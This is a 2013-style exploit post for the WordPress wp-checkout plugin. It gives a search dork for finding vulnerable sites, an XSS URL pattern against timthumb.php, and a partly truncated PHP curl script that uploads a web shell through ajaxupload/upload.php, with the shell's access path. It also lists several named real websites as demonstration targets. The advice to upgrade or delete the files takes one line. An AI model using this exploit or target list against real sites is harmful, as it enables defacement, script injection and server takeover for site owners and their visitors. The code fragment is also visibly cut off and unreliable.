#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload #Author : DevilScreaM #Date : 10/31/2013 #Category : Web Applications #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Vulnerabillity : xss, Arbitrary File Upload #Dork : inurl:wp-content/plugins/wp-checkout Cross Site Scripting http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS] Example http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=

DevilScreaM

http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=

DevilScreaM

Solution Upgrade Version Timthumb or Delete Files timthumb.php ================================================================================================= Arbitrary File Upload Exploit : http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php "@$uploadfile", 'folder'=>'/wp-content/uploads/wp-checkout/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://site-target/wp-content/uploads/wp-checkout/devilscream.php Demo : http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php